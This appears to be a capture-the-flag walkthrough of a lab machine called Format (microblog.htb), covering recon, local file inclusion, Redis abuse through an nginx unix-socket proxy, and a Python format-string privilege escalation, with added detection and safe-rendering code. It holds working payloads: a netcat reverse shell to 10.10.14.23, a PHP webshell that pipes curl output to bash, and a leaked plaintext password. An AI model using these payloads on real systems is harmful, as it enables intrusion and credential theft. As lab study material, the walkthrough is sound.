CTF format

nmap

nmap -sV -p- 10.10.11.213 -T5

/etc/hosts

got a redirection.

add app.microblog.htb to /etc/hosts

➜  ~ tail -1 /etc/hosts
10.10.11.213 format format.htb app.microblog.htb microblog.htb
PORT     STATE SERVICE REASON  VERSION
22/tcp   open  ssh     syn-ack OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey:
|   3072 c397ce837d255d5dedb545cdf20b054f (RSA)
|   256 b3aa30352b997d20feb6758840a517c1 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBAxL4FuxiK0hKkwexmffoZfwAs+0TzHjqgv3sbokWQzlt+YGLBXHmGuLjgjfi9Ir49zbxEL6iAOv8/Mj8hUPQVk=
|   256 fab37d6e1abcd14b68edd6e8976727d7 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIK9eUks4+f4DtePOKRJYzDggTf1cOpMhtAxXHGSqr5ng
80/tcp   open  http    syn-ack nginx 1.18.0
|_http-title: 404 Not Found
|_http-server-header: nginx/1.18.0
3000/tcp open  http    syn-ack nginx 1.18.0
|_http-title: Microblog
|_http-favicon: Unknown favicon MD5: F6E1A9128148EEAD9EFF823C540EF471
| http-methods:
|_  Supported Methods: GET HEAD
|_http-server-header: nginx/1.18.0
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Ports:

  • 22 ssh
  • 80 nginx/1.18.0
  • 3000 Microblog

subdomain

wfuzz -c -f subdomains -w /usr/share/wordlists/wfuzz/general/big.txt -u 'http://microblog.htb' -H 'Host: FUZZ.microblog.htb' --hw 11

=====================================================================
ID           Response   Lines    Word     Chars       Payload
=====================================================================

000000212:   200        83 L     306 W    3973 Ch     "app"
000002625:   200        42 L     434 W    3731 Ch     "sunny"

add sunny.microblog.htb to /etc/hosts

app.microblog.htb

Login form

http://app.microblog.htb/login/

Register with peanut:peanut

feroxbuster --url http://app.microblog.htb/ -x php,aspx

sunny.microblog.htb

feroxbuster --url http://sunny.microblog.htb/ -x php,aspx

Create my own website with microblog


I just add some text in the text area, but I also have an id number.

id=${7*7}&txt=${7*7}
id=../../../../../../etc/passwd&txt=${7*7}
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:999:999:systemd Time Synchronization:/:/usr/sbin/nologin
systemd-coredump:x:998:998:systemd Core Dumper:/:/usr/sbin/nologin
cooper:x:1000:1000::/home/cooper:/bin/bash
redis:x:103:33::/var/lib/redis:/usr/sbin/nologin
git:x:104:111:Git Version Control,,,:/home/git:/bin/bash
messagebus:x:105:112::/nonexistent:/usr/sbin/nologin
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
_laurel:x:997:997::/var/log/laurel:/bin/false
/var/log/laurel
cooper:x:1000:1000::/home/cooper

After a while, my blog got removed, idk why.

get nginx config file

../../../../../../../../etc/nginx/nginx.conf
user www-data;
worker_processes auto;
pid /run/nginx.pid;
include /etc/nginx/modules-enabled/*.conf;

events {
	worker_connections 768;
	# multi_accept on;
}

http {

	##
	# Basic Settings
	##

	sendfile on;
	tcp_nopush on;
	types_hash_max_size 2048;
	# server_tokens off;

	# server_names_hash_bucket_size 64;
	# server_name_in_redirect off;

	include /etc/nginx/mime.types;
	default_type application/octet-stream;

	##
	# SSL Settings
	##

	ssl_protocols TLSv1 TLSv1.1 TLSv1.2 TLSv1.3; # Dropping SSLv3, ref: POODLE
	ssl_prefer_server_ciphers on;

	##
	# Logging Settings
	##

	access_log /var/log/nginx/access.log;
	error_log /var/log/nginx/error.log;

	##
	# Gzip Settings
	##

	gzip on;

	# gzip_vary on;
	# gzip_proxied any;
	# gzip_comp_level 6;
	# gzip_buffers 16 8k;
	# gzip_http_version 1.1;
	# gzip_types text/plain text/css application/json application/javascript text/xml application/xml application/xml+rss text/javascript;

	##
	# Virtual Host Configs
	##

	include /etc/nginx/conf.d/*.conf;
	include /etc/nginx/sites-enabled/*;
}


#mail {
#	# See sample authentication script at:
#	# http://wiki.nginx.org/ImapAuthenticateWithApachePhpScript
#
#	# auth_http localhost/auth.php;
#	# pop3_capabilities "TOP" "USER";
#	# imap_capabilities "IMAP4rev1" "UIDPLUS";
#
#	server {
#		listen localhost:110;
#		protocol pop3;
#		proxy on;
#	}
#
#	server {
#		listen localhost:143;
#		protocol imap;
#		proxy on;
#	}
#}

Broke it again, let’s look at port 3000.

port 3000


Interesting files

http://microblog.htb:3000/cooper/microblog/src/branch/main/microblog/app/dashboard/index.php

function addSite($site_name) {
    if(isset($_SESSION['username'])) {
        //check if site already exists
        $scan = glob('/var/www/microblog/*', GLOB_ONLYDIR);
        $taken_sites = array();
        foreach($scan as $site) {
            array_push($taken_sites, substr($site, strrpos($site, '/') + 1));
        }
        if(in_array($site_name, $taken_sites)) {
            header("Location: /dashboard?message=Sorry, that site has already been taken&status=fail");
            exit;
        }
        $redis = new Redis();
        $redis->connect('/var/run/redis/redis.sock');
        $redis->LPUSH($_SESSION['username'] . ":sites", $site_name);
        $tmp_dir = "/tmp/" . generateRandomString(7);
        system("mkdir -m 0700 " . $tmp_dir);
        system("cp -r /var/www/microblog-template/* " . $tmp_dir);
        system("chmod 500 " . $tmp_dir);
        system("chmod +w /var/www/microblog");
        system("cp -rp " . $tmp_dir . " /var/www/microblog/" . $site_name);
        system("chmod -w microblog");
        system ("chmod -R +w " . $tmp_dir);
        system("rm -r " . $tmp_dir);
        header("Location: /dashboard?message=Site added successfully!&status=success");
    }
    else {
        header("Location: /dashboard?message=Site not added, authentication failed&status=fail");
    }
}

Website directory:

  • /var/www/microblog/

This is why we can do LFI; maybe we can inject a command.

system("cp -rp " . $tmp_dir . " /var/www/microblog/" . $site_name);

bulletproof.php

https://github.com/samayo/bulletproof

Use the image upload to upload a reverse shell?

Register


We can activate pro via Redis, then we will be able to upload an image.

Sunny

2766wxkoacy = <div class = "blog-h1 blue-fill"><b>It's Always Sunny in Philadelphia</b></div>
jtdpx1iea5 = bunch of text
rle1v1hnms = <div class = "blog-h1 blue-fill"><b>Danny DeVito??</b></div>
syubx3wiu3e = bunch of text

Users?

  • Danny DeVito
  • Rob McElhenney
  • John Landgraf
  • Frank Reynolds
  • McElhenney
  • Landgraf
  • DeVito
  • Reynolds

Then the order is used like this:

foreach($order as $line) {
    $temp = $html_content;
    $html_content = $temp . "<div class = \"{$line}\">" . file_get_contents($line) . "</div>";
}

When I add a header:

  • id=fl2vj81yx67&header=asd

When I add a text:

  • id=jghv1qnn3rj&txt=dfgdfgdfg

My user should be able to upload something to the server.
Not working, I’m not pro, need to enumerate more.
I’ve done a git clone of the repo, Gitea is slow.

bucket, redis, active pro, lfi

$redis->connect('/var/run/redis/redis.sock');
$pro = $redis->HGET($_SESSION['username'], "pro");

So I don’t have to do it while I register, can do it later.
In edit.php they check if we are pro:

$pro = $redis->HGET($_SESSION['username'], "pro");

I have to post this:

$redis->HSET(trim($_POST['username']), "pro", "true");
# instead of
$redis->HSET(trim($_POST['username']), "pro", "false");

Look in Burp to see what it is doing during the registration.
Nothing….

curl -X HSET http://microblog.htb/static/unix:%2fvar%2frun%2fredis%2fredis.sock:peanut%20pro%20true%20/
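The nginx.conf recovered above logs to /var/log/nginx/access.log with no custom log_format, so requests like the one just sent land in the default "combined" format. As an added detection example (not part of the original writeup), this parses such lines and flags the two tells of a proxy-to-unix-socket request: a non-HTTP verb in the request line and nginx's `unix:` socket syntax (or a `.sock` filename) inside the path; the log entries are constructed for the example.

```python
import re
from urllib.parse import unquote

# nginx "combined" log format (the default when nginx.conf sets no log_format).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$'
)
# Methods a blog front end legitimately receives; anything else (e.g. a Redis verb) is suspicious.
HTTP_METHODS = {"GET", "HEAD", "POST", "PUT", "DELETE", "OPTIONS", "PATCH"}

def inspect_line(line):
    """Return the reasons a request looks like a proxy-to-unix-socket attempt ([] if clean)."""
    m = LOG_RE.match(line)
    if not m:
        return ["unparseable line"]
    reasons = []
    # Decode %2f etc. so an encoded socket path reads as the path nginx would proxy to.
    path = unquote(m["path"]).lower()
    if m["method"] not in HTTP_METHODS:
        reasons.append(f"non-HTTP method {m['method']}")
    if "unix:" in path:
        reasons.append("nginx unix-socket syntax in path")
    if ".sock" in path:
        reasons.append("socket filename in path")
    return reasons

def scan(lines):
    """Return (client, raw request path, reasons) for every suspicious entry."""
    findings = []
    for line in lines:
        reasons = inspect_line(line)
        if reasons:
            m = LOG_RE.match(line)
            findings.append((m["ip"] if m else "?", m["path"] if m else line, reasons))
    return findings

# Constructed sample entries modelled on the requests in this writeup (not a real capture).
SAMPLE_LOG = [
    '10.10.14.23 - - [01/Jan/2024:12:00:01 +0000] "GET /static/css/style.css HTTP/1.1" 200 1423 "-" "Mozilla/5.0"',
    '10.10.14.23 - - [01/Jan/2024:12:00:09 +0000] "POST /dashboard/ HTTP/1.1" 302 0 "http://app.microblog.htb/" "Mozilla/5.0"',
    '10.10.14.23 - - [01/Jan/2024:12:00:20 +0000] "HSET /static/unix:%2fvar%2frun%2fredis%2fredis.sock:peanut%20pro%20true%20/ HTTP/1.1" 502 157 "-" "curl/7.88.1"',
]

if __name__ == "__main__":
    for client, request, reasons in scan(SAMPLE_LOG):
        print(client, request, "; ".join(reasons))
```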

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.14.23 4545 >/tmp/f" > shell.sh
python2.7 -m SimpleHTTPServer 80

in burp

id=/var/www/microblog/peanut/uploads/shell.php&txt=<?php system('curl http://10.10.14.23/shell.sh|bash')?>

redis

https://stackoverflow.com/questions/9445024/how-can-i-use-local-redis-client-to-connect-to-socket
from this:

$redis->connect('/var/run/redis/redis.sock');

to this:

keys *
TYPE cooper.dooper
HGETALL cooper.dooper

It’s a HASH type, so I did as he mentioned:
https://stackoverflow.com/questions/37953019/wrongtype-operation-against-a-key-holding-the-wrong-kind-of-value-php

username=cooper
password=zooperdoopercooper

root

(root) /usr/bin/license

Look at the code, then:

HMSET test first-name "{license.__init__.__globals__[secret_encoded]}" last-name test username test
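The first-name field above only works because it ends up inside a str.format() template with a license object in scope, so `__init__.__globals__` walks from a method to the module namespace. As an added example that is not the box's code or the real /usr/bin/license, a constructed stand-in shows that pattern leaking a placeholder module value, beside two renderers that treat the same field as inert data; the License class, the render_* functions and secret_encoded are all assumptions.

```python
import string

# Constructed stand-in for a module-level secret (placeholder, not the box's real value).
secret_encoded = "PLACEHOLDER-SECRET"

class License:
    """Stand-in for the tool's license object; a method's __globals__ is this module's namespace."""
    def __init__(self, owner="test"):
        self.owner = owner

def render_unsafe(first_name, last_name, lic):
    # BUG: user-controlled text is spliced into the template, so any replacement field it
    # carries, e.g. {license.__init__.__globals__[secret_encoded]}, is resolved by format().
    template = "Licensed to " + first_name + " " + last_name + " ({license.owner})"
    return template.format(license=lic)

def render_safe(first_name, last_name, lic):
    # Fix 1: the template is a constant; user data is only ever a substitution value,
    # so braces inside it are copied literally and never parsed as fields.
    return "Licensed to {first} {last} ({owner})".format(
        first=first_name, last=last_name, owner=lic.owner)

def render_safe_template(first_name, last_name, lic):
    # Fix 2: string.Template knows only $identifier, so attribute/index access is impossible
    # even if the template itself were ever built from stored data.
    return string.Template("Licensed to $first $last ($owner)").safe_substitute(
        first=first_name, last=last_name, owner=lic.owner)

# The first-name value from the HMSET line in this writeup.
FIELD = "{license.__init__.__globals__[secret_encoded]}"

def demo():
    """Render the same stored field through the unsafe and the two safe paths."""
    lic = License()
    return {
        "unsafe": render_unsafe(FIELD, "test", lic),
        "safe": render_safe(FIELD, "test", lic),
        "template": render_safe_template(FIELD, "test", lic),
    }

if __name__ == "__main__":
    for name, out in demo().items():
        print(f"{name}: {out}")
```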